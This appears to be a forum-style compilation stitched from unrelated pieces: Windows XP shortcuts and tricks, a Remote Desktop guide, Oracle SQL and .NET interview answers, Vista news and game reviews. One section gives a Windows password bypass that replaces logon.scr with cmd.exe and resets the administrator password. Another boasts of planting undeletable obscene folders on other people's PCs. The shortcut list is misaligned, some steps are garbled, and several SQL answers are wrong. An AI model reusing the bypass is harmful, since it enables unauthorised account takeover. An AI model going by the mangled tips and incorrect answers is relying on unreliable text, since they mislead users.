WIN Key+F Search for computers. CTRL+WIN Key+F Display Windows Help. WIN Key+F1 Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L Open the Run dialog box. WIN Key+R Open Utility Manager. WIN Key+U accessibility keyboard shortcuts: Switch FilterKeys on and off. Right SHIFT for eight seconds Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK Switch StickyKeys on and off. SHIFT five times Switch ToggleKeys on and off. NUM LOCK for five seconds Open Utility Manager. WIN Key+U shortcuts you can use with Windows Explorer: Display the bottom of the active window. END Display the top of the active window. HOME Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*) Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+) Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-) Collapse current selection if it's expanded, or select parent folder. LEFT ARROW Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW

internetbrowser type in u're adress "google", then press [Right CTRL] and [Enter]add www. and .com to word and go to it For Windows XP: Copy. CTRL+C Cut. CTRL+X Paste. CTRL+V Undo. CTRL+Z Delete. DELETE Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE Copy selected item. CTRL while dragging an item Create shortcut to selected item. CTRL+SHIFT while dragging an item Rename selected item. F2 Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW Highlight a block of text. CTRL+SHIFT with any of the arrow keys Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys Select all. CTRL+A Search for a file or folder. F3 View properties for the selected item. ALT+ENTER Close the active item, or quit the active program. ALT+F4 Opens the shortcut menu for the active window. ALT+SPACEBAR Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4 Switch between open items. ALT+TAB Cycle through items in the order they were opened. ALT+ESC Cycle through screen elements in a window or on the desktop. F6Display the Address bar list in My Computer or Windows Explorer. F4 Display the shortcut menu for the selected item. SHIFT+F10 Display the System menu for the active window. ALT+SPACEBAR Display the Start menu. CTRL+ESC Display the corresponding menu. ALT+Underlined letter in a menu name Carry out the corresponding command. Underlined letter in a command name on an open menu Activate the menu bar in the active program. F10 Open the next menu to the right, or open a submenu. RIGHT ARROW Open the next menu to the left, or close a submenu. LEFT ARROW Refresh the active window. F5 View the folder one level up in My Computer or Windows Explorer. BACKSPACE Cancel the current task. ESC SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.

How to hide your data on your Windows Machine

How to make files Un-Deletable with FlashFXP Start FlashFXP.. Go to Commands > Edit Custom Commands Klik on: new cmd Give it a name like: Make undeletable or something Then in the text area above the buttons typ this: Code: { rnfr %f rnto %f ./ / } Hit OK.. Connect to a server.. Click right on a map or file en go to commands > make undeletable.. And you're file is deletable.

Some of the older windows users who are familar with the NULL DOS Character (255) may know this other then that not many people are aware of how to do such a thing. i use to do this trick at school to friends pc's and also whenever i might have been in a PC store just for fun make a folder on the desktop called 'Hardcore Anal Sex' or something and see if the PC store dudes worked out how to get rid of it next time i was there Smile Ok so this is how it works. in windows(DOS) there is 255 DOS Characters. by going into DOS/CMD and holding down (ALT+157) pressing 157 on the number pad. a weird character should appear. this is one of many. if you havent used a charmap before try going to start/run and typing 'charmap' which willopen the windows character map, if you select a character u will see in teh bottom of the window it has ALT+some_numbers which is the number code for that character. and because most standard keyboards only have around 108keys there must be character codes Smile

ok so how does this help you protect your data? well if you were to name a folder one of these character then windows wouldnt know how to open it!. not all charcter but mainly characters that are equivelent to NULL.. NULL looks like this ' ' nothing but a space. like hitting space bar once, totally blank!.. ok so if you go to DOS and type cd C:\windows\desktop or what ever. just go to a directory you can visually access and see later on a physical drive (i.e. not D:\ or A:\).. ok so your in your desktop. now make a directory. `mkdir secretALT+255dir` now where ALT+255 u have to hold down ALT and press 255 in your number pad, it will just appear as tho u hit space bar once. now go to your desktop and try to open/delete/rename this folder. IMPOSSIBLE!! Smile the dir is completely locked and untouchable by all forces of life (except for DOS at this stage). so lets presume you have locked all your porno in there and your parents have gone out and u want to watch some Smile. now you have to go back into dos and rename the file to a normal name... cd C:\windows\desktop rename secretALT+255dir Folder_new_name now you your folder should be back to normal and can be accessed again. hit F5 if you see no changes. Smile have fun.

How To Remotely Access Your PC

To enabling Remote Desktop, open the System Control Panel, go to the Remote tab, and check this box. It’s important to make sure the passwords on the machine you’re going to remotely log into are “good” ones. This means you should use a mixture of letters and numbers, avoid words that are found in dictionaries, and change the password regularly to protect yourself from mischief. Making the connection At this point, your PC should be prepped and patiently waiting for a connection. To log in, you need to open the Remote Desktop Connection client on your remote PC. Go to Start, Programs, Accessories, Communications, Remote Desktop Connection. Input the IP address you want to connect to (courtesy of IP Address Monster) in the Computer field. Then enter your username and password. Now you’ll want to tweak a few settings to optimize your remote experience. Whiz-bang features gobble up bandwidth, so you should tune your settings to match your home net connection. We recommend you start with a minimal feature set. Press the Options button, then the Display tab. Change the display settings to full-screen, 256-color. This looks acceptable and consumes practically no bandwidth. You’ll also want to browse to the Experience tab and change the Performance setting to reflect your home PC’s connection speed. Switching to a lower color resolution and a smaller display area will greatly minimize the amount of data that has to transfer between your computer and the remote PC. Once you’ve tuned the connection a bit, you’re ready to connect. Press the Connect key and you’re in! What to do next At this point, you should be connected. You can run programs and manipulate files just like you’re sitting in front of your PC. In fact, you can even use your PC’s e-mail and web browsers. Do you want to start downloading Desert Combat now so you can start playing it when you get home? That’s easy enough; just log into your PC using Remote Desktop, open your web browser, and download the file. It will be sitting on your machine waiting for you as soon as you get home. If all your PCs are running Windows XP Pro, and you enable drive-sharing in the Local Resources tab, you can transfer files from remote PC to local PC. You can even remotely transfer files between local PCs on your home network. Once connected, you can interact with printer ports and networked hard drives. This is a handy way to delete those “special interest” videos you downloaded before your wife finds them.

Windows XP Professional includes a basic PC remote control tool which lets you log onto your PC remotely from anywhere. Do you know how to use it? It’s called Remote Desktop Connection, and when you’ve properly configured your PC, this handy utility will let you log into your computer from anywhere in the world and control it as if you were sitting in front of it instead of half a world away. If you’re running Windows XP Professional, you already have all the software you need to connect remotely to your PC. Whether you’d like to monitor a server, grab files from your home PC at work, or just keep an eye on your machines when you’re out, connecting remotely is easy to do. However, due to the vagaries of network configurations and various other quirks beyond your control, you may not be able to actually connect. Until now. Prepping your system First, you need to know the IP address of the computer you want to connect to. The only sure-fire way to always be able to connect to your PC’s is to use an ISP that provides you with a static IP address. Most ISPs give customers dynamic IP addresses, which can change every few days or even hours. Because your IP address is the way you’ll locate your computer on the net, you’ll need to know what your IP address is and monitor it as it changes. The good news is that there are loads of programs that will notify you of IP address changes, whenever they occur. We like IP Address Monster (www.ipmonster.com). It’s a small program that runs in your system tray and can be configured to e-mail you whenever your IP address changes. IP Address Monster should be your first stop to remote connectivity. This handy utility will keep tabs on your Internet address and send you an e-mail whenever it changes. Now that you know your IP address, you need to make sure that Remote Desktop Connection is enabled. Make sure your firewall is configured to allow incoming connections on port 3389 (firewalls vary, so check your documentation to find out how to open the port). You can turn on Remote Desktop Connection in the System Control Panel (Start, Control Panel, System). Check the Remote tab and make sure “Allow users to connect remotely to this computer” is checked. You’ll also need to have at least one user account that requires a password because accounts without passwords are prohibited from logging into Remote Desktop.

FORGOT YOUR PASSWORD ON XP? HERE'S WHAT TO DO!

Have you forgotten your password and you don't want to re-format your computer? Well here's what you do.. Please note that this only works on Windows XP! PLEASE READ CAREFULLY! 1. Restart you computer 2.When booting, press F8 and select "Safe Mode" 3.After getting to the user menu. Click on a user and this time it will not ask you for a password 4.Go to Start>Run and type "CMD" (without the quotes). 5.At command prompt type in "cd C:\Windows\System32" (without the quotes), I am assuming C is your System/Windows Drive 6.For safety purposes first make a backup of your Logon.Scr file.. You can do this by typing in "Copy to Logon.scr to Logon.bak" (without the quotes) 7.Then type "copy CMD.EXE Logon.scr"(without the quotes) 8.Then type this command, I will assume that you want to set Administrator's password to "MyNewPass" (without the quotes) 9.Now, type this in (I am assuming that you are still in the directory C:\Windows\System32) , "net user administrator MyNewPass" without the quotes 10. You will get a message saying that it was successful, this means Administrator's new password is "MyNewPass" (without the quotes) 11. Restart the PC and you will login as Administrator (or whatever you chose to reset) with your chosen password and Enjoy!

Track Ip Connected To Ur Pc Open notepad and copy and paste the following commands in it and save it as getip.cmd Code: @echo. @color 09 @netstat -n @echo. @pause Now execute this file (double click) and you can see your IP in the command prompt. It works only in NT based OS.

How to speed up your firefow browser

1. Type "about:config" into the address bar and hit return. Scroll down and look for the following entries: network.http.pipelining network.http.proxy.pipelining network.http.pipelining.maxrequests Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading. 2. Alter the entries as follows: Set "network.http.pipelining" to "true" Set "network.http.proxy.pipelining" to "true" set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once. 3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.

7. WHAT ARE HIERARCHICAL, NETWORK, AND RELATIONAL DATABASE MODELS? Ans: a) Hierarchical Model: The Hierarchical Model was introduced in the Information Management System (IMS) developed by IBM in 1968. In this data is organized as a tree structure. Each tree is made of nodes and branches. The nodes of the tree represent the record types and it is a collection of data attributes entity at that point. The topmost node in the structure is called the root. Nodes succeeding lower levels are called children. Network Model: The Network Model, also called as the CODSYL database structure, is an improvement over the Hierarchical mode, in this model concept of parent and child is expanded to have multiple parent-child relationships, i.e. any child can be subordinate to many different parents (or nodes). Data is represented by collection of records, and relationships among data are represented by links. A link is an association between precisely two records. Many-to-many relationships can exists between the parent and child. c) Relational Model: The Relational Database Model eliminates the need for explicit parent-child relationships. In RDBMS, data is organized in two-dimensional tables consisting of relational, i.e. no pointers are maintained between tables. 8. WHAT IS DATA MODELING? Ans: Data Modeling describes relationship between the data objects. The relationships between the collections of data in a system may be graphically represented using data modeling. 9. DEFINE ENTITY, ATTRIBUTE AND RELATIONSHIP. Ans: Entity: An Entity is a thing, which can be easily identified. An entity is any object, place, person, concept or activity about which an enterprise records data. Attribute: An attribute is the property of a given entity. Relationship: Relationship is an association among entities. 10. WHAT IS ER-MODELING? Ans: The E-R modeling technique is the Top Down Approach. Entity relationship is technique for analysis andlogical modeling of a system’s data requirements. It is the most widely used and has gained acceptance as the ideal database design. It uses three basic units: entities, their attributes and the relationship that exists between the entities. It uses a graphical notation for representing these. 11. WHAT IS NORMALIZATION? Ans: Normalization is a step-by-step decomposition of complex records into simple records.

1. WHAT IS DATA OR INFORMATION? Ans: The Matter that we feed into the Computer is called Data or Information. 2. WHAT IS DATABASE? Ans: The Collection of Interrelated Data is called Data Base. 3. WHAT IS A DATABASE MANAGEMENT SYSTEM (DBMS) PACKAGE? Ans: The Collection of Interrelated Data and some Programs to access the Data is Called Data Base Management System (DBMS). 4. WHEN CAN WE SAY A DBMS PACKAGE AS RDBMS? Ans: For a system to Qualify as RELATIONAL DATABASE MANAGEMENT system, it must use its RELATIONAL facilities to MANAGE the DATABASE. 5. WHAT IS ORDBMS? Ans: Object (oriented) Relational Data Base Management System is one that can store data, the relationship of the data, and the behavior of the data (i.e., the way it interacts with other data). 6. NAME SOME CODD'S RULES. Ans: Dr. E.F. Codd presented 12 rules that a database must obey if it is to be considered truly relational. Out those, some are as follows a) The rules stem from a single rule- the ‘zero rule’: For a system to Qualify as RELATIONAL DATABASE MANAGEMENT system, it must use its RELATIONAL facilities to MANAGE the DATABASE Information Rule: Tabular Representation of Information. c) Guaranteed Access Rule: Uniqueness of tuples for guaranteed accessibility. d) Missing Information Rule: Systematic representation of missing information as NULL values. e) Comprehensive Data Sub-Language Rule: QL to support Data definition, View definition, Data manipulation, Integrity, Authorization and Security.

18. CLASSIFICATION OF SQL COMMANDS? Ans: DDL (Data Definition Language) DML (Data Manipulating Language) DCL (Data Control Language) DTL(Data Transaction Language) Create Alter Drop Select Insert Update Delete Rollback Commit Grant Revoke 19. WHAT IS DIFFERENCE BETWEEN DDL AND DML COMMANDS? Ans: For DDL commands autocommit is ON implicitly whereas For DML commands autocommit is to be turned ON explicitly. 20. WHAT IS DIFFERENCE BETWEEN A TRANSACTION AND A QUERY? Ans: A Transaction is unit of some commands where as Query is a single line request for the information from the database. 21. WHAT IS DIFFERENCE BETWEEN TRUNCATE AND DELETE COMMANDS? Ans: Truncate Command will delete all the records where as Delete Command will delete specified or all the records depending only on the condition given. 22. WHAT IS DIFFERENCE BETWEEN UPDATE AND ALTER COMMANDS? Ans: Alter command is used to modify the database objects where as the Update command is used to modify the values of a data base objects. 23. WHAT ARE COMMANDS OF TCL CATEGORY? Ans: Grant and Revoke are the two commands belong to the TCL Category. 24. WHICH IS AN EFFICIENT COMMAND - TRUNCATE OR DELETE? WHY? Ans: Delete is the efficient command because using this command we can delete only those records that are not really required. 25. WHAT ARE RULES FOR NAMING A TABLE OR COLUMN? Ans: 1) Names must be from 1 to 30 bytes long. 2) Names cannot contain quotation marks. 3) Names are not case sensitive. 4) A name must begin with an alphabetic character from your database character set and the characters $ and #. But these characters are discouraged. 5) A name cannot be ORACLE reserved word. 6) A name must be unique across its namespace. Objects in the name space must have different names. 7) A name can be enclosed in double quotes.

11. WHAT IS NORMALIZATION? Ans: Normalization is a step-by-step decomposition of complex records into simple records. 12. WHAT ARE VARIOUS NORMAL FORMS OF DATA? Ans: The First Normal Form 1NF, The Second Normal Form 2NF, The Third Normal Form 3NF, The Boyce and Codd Normal Form BC NF. 13. WHAT IS DENORMALIZATION? Ans: The intentional introduction of redundancy to a table to improve performance is called DENORMALIZATION. 14. WHAT ARE 1-TIER, 2-TIER, 3-TIER OR N-TIER DATABASE ARCHITECTURES? Ans: 1-Tier Database Architecture is based on single system, which acts as both server and client. 2-Tier Architecture is based on one server and client. 3-Tier Architecture is based on one server and client out that onclient act as a remote system. N-Tier Architecture is based on N no. Of servers and N no. Of clients.

15. WHAT ARE A TABLE, COLUMN, AND RECORD? Ans: Table: A Table is a database object that holds your data. It is made up of many columns. Each of these columns has a data type associated with it. Column: A column, referred to as an attribute, is similar to a field in the file system. Record: A row, usually referred to as tuple, is similar to record in the file system. 16. WHAT IS DIFFERENCE BETWEEN A PROCEDURAL LANGUAGE AND A NON-PROCEDURAL LANGUAGE? Ans: Procedural Language NON-Procedural Language A program in this implements a step-by-step algorithm to solve the problem. It contains what to do but not how to do 17.WHAT TYPE OF LANGUAGE "SQL" IS? Ans: SQL is a Non-procedural, 4th generation Language,/ which concerts what to do rather than how to do any process.

The company also said Friday that the first beta, or test release, of Vista is slated for release by Aug. 3. That release will be targeted at developers and IT professionals, said Brad Goldberg, general manager of Windows product development ... The software giant spent roughly eight months researching potential names for the upcoming version of Windows.

OT: Official Name for Windows "Longhorn" Announced

The next version of Windows finally has an official name: Windows Vista. The advertising tagline for Vista is "Clear, Confident, Connected: Bringing clarity to your world," according to a video of the announcement posted by Microsoft.

26. HOW MANY COLUMNS CAN A TABLE HAVE? Ans: A Table can have 1000 columns. 27. WHAT ARE DIFFERENT DATATYPES SUPPORTED BY SQL? Ans: Char (size), Nchar (size), Varchar2 (size), Nvarchar2 (size) data types for character values, Number (precision, scale), Number, Number (n), Float, Float (binary precision) data types for numerical values, Date data type for date values, Long, Raw (size), Long Raw, Clob, Blob, Nclob, Bfile for large objects. 28. WHAT IS DIFFERENCE BETWEEN LONG AND LOB DATATYPES? Ans: LOB LONG 1) The maximum size is 4GB. 2) LOBs (except NCLOB) can be attributes of an object type. 3) LOBs support random access to data. 4) Multiple LOB columns per table or LOB attributes in an object type. 1) The maximum size is 2GB. 2) LONGs cannot. 3) LONGs support only sequential access. 4) Only one LONG column was allowed in a table 29. WHAT IS DIFFERENCE BETWEEN CHAR AND VARCHAR2 DATATYPES? Ans: Varchar2 is similar to Char but can store variable no. Of characters and while querying the table varchar2 trims the extra spaces from the column and fetches the rows that exactly match the criteria. 30. HOW MUCH MEMORY IS ALLOCATED FOR DATE DATATYPE? WHAT IS DEFAULT DATE FORMAT IN ORACLE? Ans: For Date data type oracle allocates 7 bytes Memory. Default Date Format is: DD-MON-YY. 31. WHAT IS RANGE FOR EACH DATATYPE OF SQL? Ans: Datatype Range Char Varchar2 Number Float LONG, RAW, LONGRAW Large Objects (LOB’s) 2000 bytes 4000 bytes Precision 1 to 38 Scale -84 to 127 Precision 38 decimals Or 122 binary precision 2 GB 4GB 32. HOW TO RENAME A COLUMN? Ans: We can’t rename a Column of a table directly. So we follow the following steps. To Rename a Column: a) Alter the table specifying new column name to be given and data type. Then copy the values in the column to be renamed into new column. c) drop the old column. 33. HOW TO DECREASE SIZE OR CHANGE DATATYPE OF A COLUMN? Ans: To Decrease the size of a Data type of a column i. Truncate the table first. ii. Alter the table column whose size is to be decreased using the same name and data type but new size.

34. WHAT IS A CONSTRAINT? WHAT ARE ITS VARIOUS LEVELS? Ans: Constraint: Constraints are representators of the column to enforce data entity and consistency.There r two levels 1)Column-level constraints 2)Table-level constraints. 35. LIST OUT ALL THE CONSTRAINTS SUPPORTED BY SQL. Ans: Not Null, Unique, Check, Primary Key and Foreign Key or Referential Integrity. 36. WHAT IS DIFFERENCE BETWEEN UNIQUE+NOT NULL AND PRIMARY KEY? Ans: Unique and Not Null is a combination of two Constraints that can be present any number of times in a table and can’t be a referential key to any column of an another table where as Primary Key is single Constraint that can be only once for table and can be a referential key to a column of another table becoming a referential integrity. 37. WHAT IS A COMPOSITE PRIMARY KEY? Ans: A Primary key created on combination of columns is called Composite Primary Key. 39. HOW TO DEFINE A NULL VALUE? Ans: A NULL value is something which is unavailable, it is neither zero nor a space and any mathematical calculation with NULL is always NULL. 40. WHAT IS NULL? A CONSTRAINT OR DEFAULT VALUE? Ans: It is a default value. 41. WHAT IS DEFAULT VALUE FOR EVERY COLUMN OF A TABLE? Ans: NULL. 42. WHAT IS CREATED IMPLICITLY FOR EVERY UNIQUE AND PRIMARY KEY COLUMNS? Ans: Index. 43. WHAT ARE LIMITATIONS OF CHECK CONSTRAINT? Ans: In this we can't specify Pseudo Columns like sysdate etc. 44. WHAT IS DIFFERENCE BETWEEN REFERENCES AND FOREIGN KEY CONSTRAINT? Ans: References is used as column level key word where as foreign key is used as table level constraint. 45. WHAT IS "ON DELETE CASCADE"? Ans: when this key word is included in the definition of a child table then whenever the records from the parent table is deleted automatically the respective values in the child table will be deleted.

59. WHAT IS A CORRELATED SUB QUERY, HOW IT IS DIFFERENT FROM A NORMAL SUB QUERY? Ans: A correlated subquery is a nested subquery, which is executed once for each ‘Candidate row’ by the main query, which on execution uses a value from a column in the outer query. In normal sub query the result of inner query is dynamically substituted in the condition of the outer query where as in a correlated subquery, the column value used in inner query refers to the column value present in the outer query forming a correlated subquery. 60. WHAT IS A JOIN - TYPES OF JOINS? Ans: A join is used to combine two or more tables logically to get query results. There are four types of Joins namely EQUI Join NON-EQUI Join SELF Join OUTER Join. 61. WHAT ARE MINIMUM REQUIREMENTS FOR AN EQUI-JOIN? Ans: There shold be atleast one common column between the joining tables. 62. WHAT IS DIFFERENCE BETWEEN LEFT, RIGHT OUTER JOIN? Ans:If there r any values in one table that do not have corresponding values in the other,in an equi join that row will not be selected.Such rows can be forcefully selected by using outer join symbol(+) on either of the sides(left or right) based on the requirement. 63. WHAT IS DIFFERENCE BETWEEN EQUI AND SELF JOINS? Ans: SELF JOIN is made within the table whereas EQUI JOIN is made between different tables having common column. 64. WHAT ARE "SET" OPERATORS? Ans: UNION, INTERSECT or MINUS is called SET OPERATORS. 65. WHAT IS DIFFERENCE BETWEEN "UNION" AND "UNION ALL" OPERATORS? Ans: UNION will return the values distinctly whereas UNION ALL will return even duplicate values. ****END of Part 1**** ****Will continue in next issue****

46. WHAT IS PARENT-CHILD OR MASTER-DETAIL RELATIONSHIP? Ans: A table which references a column of another table(using References)is called as a child table(detail table) and a table which is being referred is called Parent (Master) Table . 47. HOW TO DROP A PARENT TABLE WHEN IT’S CHILD TABLE EXISTS? Ans: Using "on delete cascade". 48. IS ORACLE CASE SENSITIVE? Ans: NO 49. HOW ORACLE IDENTIFIES EACH RECORD OF TABLE UNIQUELY? Ans: By Creating indexes and reference IDs. 50. WHAT IS A PSEUDO-COLUMN? NAME SOME PSEUDO-COLUMNS OF ORACLE? Ans: Columns that are not created explicitly by the user and can be used explicitly in queries are called Pseudo-Columns. Ex:currval,nextval,sysdate…. 51. WHAT FOR "ORDER BY" CLAUSE FOR A QUERY? Ans: To arrange the query result in a specified order(ascending,descending) by default it takes ascending order. 52. WHAT IS "GROUP BY" QUERIES? Ans: To group the query results based on condition. 53. NAME SOME AGGREGATE FUNCTIONS OF SQL? Ans: AVG, MAX, SUM, MIN,COUNT. 54. WHAT IS DIFFERENCE BETWEEN COUNT (), COUNT (*) FUNCTIONS? Ans: Count () will count the specified column whereas count (*) will count total no. of rows in a table. 55. WHAT FOR ROLLUP AND CUBE OPERATORS ARE? Ans: To get subtotals and grand total of values of a column. 56. WHAT IS A SUB-QUERY? Ans: A query within a query is called a sub query where the result of inner query will be used by the outer query. 57. WHAT ARE SQL OPERATORS? Ans: Value (), Ref () is SQL operator. 58. EXPLAIN "ANY","SOME","ALL","EXISTS" OPERATORS? Ans: Any: The Any (or it’s synonym SOME) operator computes the lowest value from the set and compares a value to each returned by a sub query. All: ALL compares a value to every value returned by SQL. Exists: This operator produces a BOOLWAN results. If a sub query produces any result then it evaluates it to TRUE else it evaluates it to FALSE.

What platforms do .NET XML Web Services run on? Currently, they're supported on Windows 2000 and Windows XP. ASP.NET integrates with Internet Information Server (IIS) and thus requires that IIS be installed. It runs on server and non-server editions of Windows 2000 and XP as long as IIS is installed. Can two different programming languages be mixed in a single ASMX file? No. What is code-behind? Code-behind allows you to associate Web Service source code written in a CLR compliant language (such as C# or VB.NET) as compiled in a separate file (typically *.asmx.cs or *.asmx.vb). You would otherwise typically find the executable code directly inserted into the .asmx file. What namespaces are imported by default in ASMX files? The following namespaces are imported by default. Other namespaces must be imported manually.· System, System.Collections,System.ComponentModel,System.Data, System.Diagnostics,System.Web,System.Web.Services How do I provide information to the Web Service when the information is required as a SOAP Header? The key here is the Web Service proxy you created using wsdl.exe or through Visual Studio .NET's Add Web Reference menu option. If you happen to download a WSDL file for a Web Service that requires a SOAP header, .NET will create a SoapHeader class in the proxy source file. Using the previous example: public class Service1 : System.Web.Services.Protocols.SoapHttpClientProtocol { public AuthToken AuthTokenValue; [System.Xml.Serialization.XmlRootAttribute(Namespace="http://tempuri.org/", IsNullable=false)] public class AuthToken : SoapHeader { public string Token; }} In this case, when you create an instance of the proxy in your main application file, you'll also create an instance of the AuthToken class and assign the string: Service1 objSvc = new Service1(); processingobjSvc.AuthTokenValue = new AuthToken(); objSvc.AuthTokenValue.Token = <actual token value>; Web Servicestring strResult = objSvc.MyBillableWebMethod(); What is WSDL? WSDL is the Web Service Description Language, and it is implemented as a specific XML vocabulary. While it's very much more complex than what can be described here, there are two important aspects to WSDL with which you should be aware. First, WSDL provides instructions to consumers of Web Services to describe the layout and contents of the SOAP packets the Web Service intends to issue. It's an interface description document, of sorts. And second, it isn't intended that you read and interpret the WSDL. Rather, WSDL should be processed by machine, typically to generate proxy source code (.NET) or create dynamic proxies on the fly (the SOAP Toolkit or Web Service Behavior).

Rome: Total War Barbarian Invasion

Rome: Total War - Barbarian Invasion E3 2005 Impressions

Excellent news: One of the best strategy games of 2004 is getting an expansion.

PC strategy fans got a major shock earlier this year when Sega acquired British developer Creative Assembly, the creator of the acclaimed Total War series of strategy games. To make things even worse, Sega promptly announced that CA's next game would be a hybrid action/strategy game developed for the consoles. Was nothing sacred? Well, the Creative Assembly folks haven't turned their backs on the PC, and the company is still plugging away on the platform that made them. It is also putting the finishing touches on Rome: Total War - Barbarian Invasion, the expansion pack to one of last year's best games.

So what can we expect in Barbarian Invasion? Like the Viking Invasion expansion for Medieval: Total War, Barbarian Invasion depicts a very dark era in human history: the slow collapse of the once-mighty Roman Empire. As a result, the game is set hundreds of years after the main campaign in the original game, and you'll have a whole host of new barbarian tribes and nations to deal with, such as the Ostrogoths. And keep in mind that the Roman Empire had split into two, with the Byzantine Empire setting up in Constantinople. Other additions to the campaign game include 21 new buildings and technologies.

There are some major new additions to the real-time battle system as well. The biggest is the introduction of night battles in the expansion. This means that you'll now see formations in the distance by their torches, and you'll also see cool lighting effects, such as the way a blazing fireball briefly illuminates the ground as it flies through the air. One big question that remains, though, is whether Creative Assembly can retrofit night battles into the original Rome: Total War. It's something that the company is looking into, but it may require a lot of code changes it doesn't have time for. Another new addition is that some types of units now have limited swimming ability, so they'll be able to wade into a river and even swim a short distance, giving you some extra mobility on the battlefield, as well as a way to escape entrapment. Of course, there are plenty of new units to play with as well.

Barbarian Invasion sweeps Europe, North America

Sega ships Rome: Total War expansion; add-on takes place 200 years after original game, features 10 new factions, night battles, and more.

The union of Sega and The Creative Assembly has yielded its first fruit today, as the Rome: Total War Barbarian Invasion expansion pack is now headed to retailers across Europe and North America.

Set 200 years after the main campaign of Rome: Total War, Barbarian Invasion sees the outsider hordes massing on the borders of a declining Roman Empire. It's up to players to decide whether they will save Rome from its enemies or simply sack it. In addition to the new campaign mode, Barbarian Invasion adds new features and units to the real-time strategy game. There are 10 new factions, more than 100 new units, night battles, revamped artificial intelligence in battles, and more.

Ultimate Spider-Man

The Ultimate Spider-Man comic series is a reenvisioning of the early days of Spider-Man lore. Here, Peter Parker is a scrawny 15-year-old kid, granted his powers via the infamous radioactive spider on a class field trip. The plot of the Ultimate Spider-Man game doesn't spend much time getting you up to speed with this, instead taking just a brief minute or two to quickly show Parker's transformation into the titular hero, as well as a bit of backstory about how he and his childhood friend, Eddie Brock, stumble upon a mysterious bioengineered suit that both their fathers had apparently been working on before their deaths. As any comic aficionado might assume, this is the suit that turns Brock into the gruesome, tongue-lashing beast known as Venom, and that's right where things pick up. The plot itself is something of a disjointed affair; it's really more of an excuse to squeeze as many relevant Marvel characters as possible into the package. But it does a good job of achieving this goal by including plenty of friendly faces such as Wolverine and the Human Torch, as well as modern versions of big-time villains such as Carnage, Electro, Green Goblin, and, of course, Venom himself.

The story ends up a winner because it sticks so closely to its comic-book roots--it's just too bad that there isn't very much of it. To get through the entire story mode, it shouldn't take you more than a half-dozen hours at most, and only about five hours of that actually make up story missions. Ultimate Spider-Man retains the sort of open-ended nature of Spider-Man 2, letting you roam around the city of New York, swinging your way to assorted side missions scattered about the town. Most of these are basic checkpoint races, combat missions in which your entire goal is to beat up a bunch of gang members, and city events, which simply consist of quick-rescue operations and breakups of bank robberies or what have you. These missions aren't optional, though. They appear that way at first, but you'll soon find that you have to beat them to unlock more story missions--and in some cases, you only unlock a cutscene and then have to go back out into the city to beat more side missions to move on again. Essentially, it feels like the developers quickly ran out of story and hastily decided to make these missions required play to pad out the length.

This padding really does kill some of the fun, because the races, of which you'll be doing the most of early on in the game, just aren't much fun. The combat tours and city events make more sense, since Spidey's known for swooping down, whooping some ass, and then swinging away into the sunset. But these missions are far too repetitive, requiring you to perform many of the same tasks over and over again until you just don't want to do them anymore. This is doubly unfortunate, because that's pretty much all there is to do once the story mode is over with.

The Good Colorful, crisp cel-shading gives the game an awesome comic book-inspired look; Some excellent boss fights; Sharp voice acting and writing; Good story; The Bad Too many lame race and chase missions; Too few story missions--remaining side missions aren't good enough to warrant much replay value; Camera can sometimes make combat a pain; Serious webheads will get something positive out of Ultimate Spider-Man, but they should do so with one of the console versions, as the PC version of the game isn't the ideal one.

Superhero games, like superhero movies, are steadily starting to improve. Generally, it helps to base a game more within a hero's given comic-book universe, as opposed to directly upon any of the aforementioned films. Compare the recent Incredible Hulk and X-Men games based within the comic universe with the Fantastic Four and Batman games based on films; the difference ought to be clear. One franchise that's been stuck somewhere in the middle over its last couple of installments is the Spider-Man series. The first two games were based directly on the megapopular films, and while neither could be called bad, they weren't anything to write home about. Ultimate Spider-Man is developer Treyarch's third attempt to make a quality Spidey game, by way of developer Beenox, which has ported the console game to the PC. Based on the eponymous comic-book series, Ultimate Spider-Man is certainly an improvement, adding a great sense of comic-book style to the package and getting a whole host of familiar Marvel characters into the mix. Unfortunately, it also suffers from some of the familiarly flawed gameplay of its predecessors, and it's a disappointingly short ride.

Fortunately, the story missions are a lot better, especially the boss fights against the main villains, as well as the several sections where you play as Venom. These fights are often challenging and satisfying, though the final confrontation is a bit anticlimactic. The game also leans a little too heavily on chase missions, where your goal is, again, to race around the city, but with the twist of having to stay within a specific distance of the opposing character. It's an OK idea in theory, but there are too many of these sequences, and it can sometimes be tough to get a good bearing on where your target is, since there's no icon or anything denoting where the target is--all you get is a sometimes unhelpful arrow to point you in the right direction. Were there more of the big, epic fights against the villains and more variety to the day-to-day rescues and crime stoppage, Ultimate Spider-Man would be a lot better off.

For those who played either of the last couple of Spider-Man games, Ultimate Spider-Man features a couple of key gameplay differences. For one, the combat is less clunky. Spider-Man attacks with simple, effective combos that don't require much more than a few bits of button mashing. You can still combine Spidey's webs into the fray, but there's less you can actually do with that. Venom's attacks are similarly simple, though they rely more on whips of his tendrils and powerful killing moves, unlike Spider-Man's quick and nimble maneuvers. Venom also has to deal with an ever-draining life force, requiring him to occasionally feed on enemies and helpless passersby. It's pretty brutal, since you can basically feed on and kill any man, woman, or child that happens into the brute's path. It also makes the Venom sequences a lot easier, since most areas give him plenty of people with which to quench his thirst. Spider-Man's portions often lack health power-ups, which makes them a touch more challenging--and sometimes, frustrating.

